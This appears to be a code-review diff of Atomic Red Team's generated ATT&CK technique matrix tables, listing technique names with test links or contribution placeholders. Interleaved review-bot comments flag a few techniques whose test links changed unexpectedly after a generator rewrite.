| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Content Injection](../../T1659/T1659.md) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
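Review bot: the only difference between the three removed rows and the three re-added rows (the rows beginning Content Injection, Valid Accounts: Default Accounts and Trusted Relationship) is that Content Injection (T1659, in both the Initial Access and the Command and Control column) and System Service Discovery (T1007) switch between a link to an existing test directory and the CONTRIBUTE A TEST placeholder. For a commit described only as "python conversion", the regenerated matrix should come out identical to the previous generator's output; a technique gaining or losing a test link is a behavioural difference in the new generator (how it matches a technique id to an atomics directory or to a platform), not an intended content change. Suggest checking whether tests for T1659 and T1007 exist for this platform in the atomics tree and fixing the generator so the matrix reflects that, rather than merging the flipped rows as-is.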
@@ -31,7 +31,7 @@
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
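Review bot: in the fourth column the cell changes from `[Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)` to `Python Startup Hooks [CONTRIBUTE A TEST]`, dropping both the test link and the parent-technique prefix. The shortened name is consistent with how every other unlinked cell in this table is rendered, so the naming is fine, but losing the T1546.018 link is a content change that a tooling conversion should not produce on its own. If T1546.018 genuinely has no test for this platform the commit message should say so; otherwise this is the same generator lookup problem as the earlier hunk and should be fixed at the source.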
@@ -40,7 +40,7 @@
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | [System Time Discovery](../../T1124/T1124.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
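Review bot: same T1546.018 flip as the previous hunk, this time in the third column (`[Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)` becoming `Python Startup Hooks [CONTRIBUTE A TEST]`). One technique changing state in two columns of the same file is what you would expect from a lookup difference in the generator rather than from a change to the atomics themselves; worth confirming which side is correct against the T1546.018 directory before accepting either.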
+10 -10
@@ -3,19 +3,19 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
